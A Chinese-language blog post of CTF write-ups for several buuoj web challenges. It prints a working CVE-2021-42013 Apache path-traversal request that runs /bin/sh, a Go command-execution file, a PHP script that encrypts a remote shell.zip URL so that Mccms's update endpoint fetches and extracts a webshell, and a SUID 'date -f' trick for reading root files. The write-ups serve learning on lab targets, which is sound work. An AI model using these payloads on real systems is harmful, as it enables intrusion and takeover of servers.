Power Cookie

发现set-cookie:admin=0

image-20220524205716311

因此添加cookie:admin=1即可

image-20220524205803424

魔法浏览器

f12看到一串js代码,控制台打印得到ua头

image-20220524210121097

更换得到flag

image-20220524210244195

getme

页面源码有提示

抓包发现Apache/2.4.50

搜索发现该版本存在CVE-2021-42013,存在目录穿越,可以直接读取文件或rce

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: node4.buuoj.cn:25647
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT
If-None-Match: "8d-5de58c91a8500"
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

echo;cat /diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg

image-20220521205000335

hackme

访问users会提示

image-20220524211058705

所以只需上传一个users.go文件即可

没学过go,网上找的

package main
import (
"bytes"
"fmt"
"log"
"os/exec"
)
const ShellToUse = "bash"
func Shellout(command string) (error, string, string) {
var stdout bytes.Buffer
var stderr bytes.Buffer
cmd := exec.Command(ShellToUse, "-c", command)
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
return err, stdout.String(), stderr.String()
}
func main() {
err, out, errout := Shellout("cat /flag")
if err != nil {
log.Printf("error: %v\n", err)
}
fmt.Println("--- stdout ---")
fmt.Println(out)
fmt.Println("--- stderr ---")
fmt.Println(errout)
}

image-20220524210902130

当时没做出来,没想到要传users.go,一直随便命名的,一直不对,因为没学过go,还以为是网上找的代码有问题。。。

fxxkgo

go的代码审计,告辞

ezcms

唉,这种cms的审计还是不会,得找时间补补

用Seay打开,自动审计处几百个漏洞点

看wp知道,这题的漏洞点在这(话说正常做题的话是要一个个看下来吗)

image-20220524222649078

Update.php

<?php
/*
'软件名称:漫城CMS(Mccms)
'官方网站:http://www.mccms.cn/
'软件作者:桂林崇胜网络科技有限公司(By:烟雨江南)
'--------------------------------------------------------
'Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
'遵循Apache2开源协议发布,并提供免费使用。
'--------------------------------------------------------
*/
defined('BASEPATH') OR exit('No direct script access allowed');

class Update extends Mccms_Controller {
    function __construct(){
        parent::__construct();
        //判断是否登陆
        $this->admin->login();
    }

    //更新
    public function index()
    {
        $zipurl = $this->input->get('url',true);
        $token = $this->input->get('token',true);
        if(empty($zipurl)) $this->msg('更新包地址为空');
        $md5 = md5($zipurl.Mc_Encryption_Key);
        
        //下载文件
        $zipurl = sys_auth($zipurl,1);
        if(empty($zipurl)) $this->msg('更新包地址错误');
        //获取文件头信息
        $arr = get_headers($zipurl,true);
        if($arr['Content-Type'] !== 'application/zip') $this->msg('压缩包不zip类型文件');
        $data = getcurl($zipurl);
        if(empty($data)) $this->msg('获取压缩包失败');
        $file_zip = FCPATH."caches/upzip/".end(explode('/',$zipurl));
        if(!file_put_contents($file_zip, $data)) $this->msg('压缩包下载失败');
        //解压
        $this->load->library('mczip');
        $this->mczip->PclZip($file_zip);
        if ($this->mczip->extract(PCLZIP_OPT_PATH, FCPATH, PCLZIP_OPT_REPLACE_NEWER) == 0) {
            unlink($file_zip);
            $this->msg('文件解压失败,或者没有权限覆盖文件~!');
        }else{
            unlink($file_zip);
            $this->msg('版本升级成功~!',1);
        }
    }

    public function msg($txt,$zt=0){
        $color = $zt == 0 ? 'red' : '#080';
        echo '<link rel="stylesheet" href="'.Web_Path.'packs/admin/css/style.css"><div style="padding:50px;"><fieldset class="layui-elem-field"><legend><b>更新状态</b></legend><div class="layui-field-box" style="color:'.$color.';font-size:16px;">'.$txt.'</div></fieldset></div>';
        if($zt == 1){
            echo '<script>setTimeout(function(){parent.location.reload();},2000);</script>';
        }
        exit;
    }
}

可以看到会远程加载一个zip文件然后解压更新

Mc_Encryption_Key为全局变量

image-20220524223002672

sys_auth为加解密函数

image-20220524223230237

getcurl为获取远程内容

image-20220524223243870

因此我们需要传入一个加密过的url地址,内容为一句话套个zip

<?php
define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');

$strings = 'https://xxx/shell.zip';

echo(sys_auth($strings));


function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
    if(is_array($string)) $string = json_encode($string);
    if($type == 1) $string = str_replace('-','+',$string);
    $ckey_length = 4;
    $key = md5($key ? $key : Mc_Encryption_Key);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $type == 1 ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    } 
    if($type == 1) {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            $result = substr($result, 26);
            $json = json_decode($result,1);
            if(!is_numeric($result) && $json){
                return $json;
            }else{
                return $result;
            }
        }
        return '';
    }
    return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}

然后访问

http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/admin.php/update?url=7cd7JNh1v1QgVwK42dyWMvv4lUhGeXhsJdy2EwOyln9E4mz08u5PxVCL4UTxvhxIN4F00bMKJLfsduaC6fMc

蚁剑连接

http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/shell.php

image-20220524223509940

但这题好像有好多非预期,也就是说这个cms还有好多漏洞,抽空可以试着审一审

rootme

这题是misc里的,已经不碰misc了,但看了眼wp,感觉这题更像web题

先ssh连接

ssh ubuntu@node4.buuoj.cn -p 28081

flag在/root/flag.txt中,显然是没有权限读的

查看具有suid的文件

find / -perm -u=s -type f 2>/dev/null

image-20220524183048853

发现date

date其实是可以读文件的

date -f /root/flag.txt

image-20220524183259878

最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏